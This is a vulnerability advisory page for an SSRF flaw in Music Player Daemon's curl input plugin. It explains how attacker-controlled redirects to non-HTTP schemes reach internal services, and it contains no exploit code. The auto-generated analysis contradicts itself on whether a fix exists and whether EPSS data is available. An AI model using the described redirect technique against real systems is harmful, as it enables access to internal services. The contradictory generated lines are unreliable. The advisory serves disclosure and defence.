Description
Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0.
Published: 2026-05-28
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Music Player Daemon (MPD) contains a server‑side request forgery flaw in the CurlInputPlugin. Because the code sets CURLOPT_FOLLOWLOCATION without configuring CURLOPT_REDIR_PROTOCOLS_STR, an attacker can cause the MPD server to follow redirects to protocols other than http/https, such as gopher, ftp, sftp, ldap, dict, rtmp or rtsp. This permits unauthenticated users to direct the MPD server to access internal or restricted services, potentially leaking confidential data or enabling further lateral movement. The weakness is a classic SSRF (CWE‑918) with medium severity (CVSS 6.9).

Affected Systems

All instances of Music Player Daemon running a version earlier than 0.24.11 are affected. The vulnerability is relevant when the MPD server uses libcurl prior to version 7.85.0, as older libcurl implementations lack the necessary protocol‑restriction controls. Users running MPD on any platform that exposes the standard MPD control interface to the local or network hosts are at risk.

Risk and Exploitability

The flaw can be triggered via MPD commands that initiate URL fetches—add, readcomments, albumart, readpicture, or load—without requiring administrative credentials. The attacker only needs the ability to issue MPD commands, which is typically possible from any machine that can communicate with the MPD control socket or TCP port. Although EPSS data is not available and the vulnerability is not listed in CISA’s KEV catalog, the medium CVSS score and the ability to reach internal services mean the exploitation risk is notable. The impact is confined to the MPD server host and any services reachable from it, but could enable enumeration of internal hosts or extraction of sensitive files if the target services are poorly protected.

Generated by OpenCVE AI on May 28, 2026 at 20:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade MPD to version 0.24.11 or later, which removes the SSRF flaw in CurlInputPlugin.
  • Update the underlying libcurl library to version 7.85.0 or newer to gain proper protocol restrictions.
  • Configure network controls or firewall rules to limit the MPD server’s outbound connections, especially to non‑HTTP protocols, and consider disabling or removing the CurlInputPlugin if not required.

Generated by OpenCVE AI on May 28, 2026 at 20:22 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 29 May 2026 16:00:00 +0000

Type Values Removed Values Added
First Time appeared Musicplayerdaemon
Musicplayerdaemon mpd
Vendors & Products Musicplayerdaemon
Musicplayerdaemon mpd

Fri, 29 May 2026 14:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 28 May 2026 21:30:00 +0000

Type Values Removed Values Added
References

Thu, 28 May 2026 19:45:00 +0000

Type Values Removed Values Added
Description Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0.
Title Music Player Daemon < 0.24.11 SSRF via CurlInputPlugin
Weaknesses CWE-918
References
Metrics cvssV3_1

{'score': 5.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N'}

cvssV4_0

{'score': 6.9, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N'}

Subscriptions

Musicplayerdaemon Mpd
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-29T13:57:37.912Z

Reserved: 2026-05-27T17:40:12.738Z

Link: CVE-2026-49129

cve-icon Vulnrichment

Updated: 2026-05-29T13:57:34.097Z

cve-icon NVD

Status : Deferred

Published: 2026-05-28T20:16:26.683

Modified: 2026-05-29T14:07:47.980

Link: CVE-2026-49129

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-29T15:47:54Z

Weaknesses